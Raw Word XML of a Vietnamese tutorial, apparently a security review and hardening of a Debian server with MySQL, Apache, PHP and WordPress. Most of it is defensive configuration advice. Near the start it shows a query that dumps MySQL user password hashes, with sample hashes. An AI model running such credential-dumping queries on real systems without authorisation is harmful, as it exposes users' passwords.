          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Dựa trên phiên bản này, chúng ta có thể tìm kiếm bất kỳ lỗ hổng nào trong bản phát hành này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D937E5"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chúng ta sẽ lấy danh sách người dùng và mật khẩu của họ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C422C8D"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SELECT Host, User, Password FROM mysql.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>user;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01B3E755" w14:textId="5383E7AA"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19CFC9F8">
          <v:shape id="Picture 34" o:spid="_x0000_i1236" type="#_x0000_t75" style="width:408pt;height:123pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId232" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE4DA4" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây, chúng ta có thể thấy những người dùng sau có quyền truy cập vào cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B57B66" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>root from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>localhost;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="254BDB56" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>debian-sys-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>maint;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A2A3F91" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D588E5" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trên MySQL, có hai thuật toán được sử dụng để mã hóa mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F1B6A0" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với mật khẩu cũ, với thuật toán này mật khẩu được mã hóa trông giống như </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>43e9a4ab75570f5b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7CE4B" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với mật khẩu mới, với thuật toán này, mật khẩu sẽ trông giống như </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>* 4ACFE3202A5FF5CF467898FC58AAB1D61502944.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B21FF7" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta có thể dễ dàng kiểm tra điều này khi bạn được kết nối với cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380FF00" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>select password('admin'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>) ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66C38CA6" w14:textId="0A6DA2CB"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7246350A">
          <v:shape id="Picture 35" o:spid="_x0000_i1237" type="#_x0000_t75" style="width:282.75pt;height:90.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId233" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F79A7D" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là dạng mã hóa mới đối với mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE939E" w14:textId="194750E5"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757B610E">
          <v:shape id="Picture 36" o:spid="_x0000_i1238" type="#_x0000_t75" style="width:227.25pt;height:93pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId234" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1BE95" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là dạng mã hóa của mạt khẩu cũ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52193E15" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta đến cấu hình của Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F914F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Vì máy chủ được sử dụng như một máy chủ của trang web, điều quan trọng là ta phải xem lại cấu hình của máy chủ web Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2649D5"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ầu tiên, tốt nhất ta nên kiểm tra xem máy chủ web đang chạy với tư cách người dùng nào, chúng ta có thể tìm hiểu bằng cách dùng dòng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc bằng cách xem lại cấu hình của Apache và tìm kiếm các giá trị Người dùng và Nhóm.  Ở đây chúng có sẵn trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB4AD1"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rước tiên dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/apache2/envvars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A216FC" w14:textId="5F613B59"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568C4C8A">
          <v:shape id="Picture 37" o:spid="_x0000_i1239" type="#_x0000_t75" style="width:342.75pt;height:183pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId235" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="595879F7" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đang được sử dụng bằng người dùng User và root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BF051"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ể có thể đảm bảo rằng không có người dùng cục bộ nào có thể sửa đổi trang web được lưu trữ và để tăng cường khai thác lỗ hổng bảo mật có thể xảy ra, chúng ta nên hạn chế quyền truy cập vào web bằng user root. Ở đây, chúng ta có thể thấy rằng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DocumentRoot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/var /www/wordpress</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>, chúng ta có thể kiểm tra rằng quyền không bị hạn chế chính xác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F295F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ls -lR /var/www/wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2E21A" w14:textId="1763A6DC"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49D8A5F6">
          <v:shape id="Picture 38" o:spid="_x0000_i1240" type="#_x0000_t75" style="width:316.5pt;height:201.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId236" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8C8F4"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ác tệp sẽ không có sẵn cho bất kỳ người dùng nào.  Để hạn chế được rủi ro máy chủ web ghi đè, quyền sở hữu hoàn toàn ứng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>dụng  web</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể được trao cho người dùng thứ ba để khai thác lỗ hỏng.  Bằng cách này, máy chủ web sẽ không thể sửa đổi ứng dụng web.  Tuy nhiên, điều này có thể làm hỏng một số ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1F362" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Vậy phương pháp tốt nhất là luôn để tránh thông tin thừa trong tiêu đề của máy chủ web.  Để ngăn Apache bị rò rỉ nhiều thông tin, nên xem lại các thông số sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402E007" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ServerTokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>: khuyến cáo nên để giá trị là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prod</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5935D3" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ServerSignature</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t> nên được tắt đi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272ABDA"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Trên Debian, hai tham số này được cấu hình trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/apache2/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conf.d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3437BFFC" w14:textId="0A628BD7"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3EBD974F">
          <v:shape id="Picture 39" o:spid="_x0000_i1241" type="#_x0000_t75" style="width:317.25pt;height:126.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId237" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CCEEB4"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Đây là hai giá trị mặc </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>định,để</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉnh sửa file chúng ta dùng lệnh nano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EE4629" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41065368" w14:textId="48313C7F"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5A31EBD5">
          <v:shape id="Picture 40" o:spid="_x0000_i1242" type="#_x0000_t75" style="width:282.75pt;height:125.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId238" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABAA5AF" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Phần tiếp theo sẽ là tìm hiểu về PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572E970" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây, chúng ta sẽ tập trung vào cấu hình PHP được Apache2 sử dụng.  Chúng ta có thể thấy trong cấu hình Apache rằng tệp sau được tải:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347256BD" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/apache2/mods-enabled/php5.load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21765D77" w14:textId="65D90FE7"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290CA9C1">
          <v:shape id="Picture 41" o:spid="_x0000_i1243" type="#_x0000_t75" style="width:354.75pt;height:27.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId239" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EC58AC" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu chúng ta dùng lệnh strings trên tệp nhị phân đó để tìm kiếm apache2, chúng ta có thể thấy một số thông tin thú vị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12B267" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>strings /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr/lib/apache2/modules/libphp5.so  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> grep apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52CCD3" w14:textId="6347D7C2"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077D0C27">
          <v:shape id="Picture 42" o:spid="_x0000_i1244" type="#_x0000_t75" style="width:417pt;height:95.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId240" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25885EFF"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húng ta có thể thấy hai cách tìm kiếm PHP sẽ tìm kiếm nó là cấu hình.  Bằng cách đọc tài liệu Debian, chúng ta có thể xác nhận rằng cấu hình PHP được Apache2 sử dụng được lưu trữ trong thư mục </w:t>
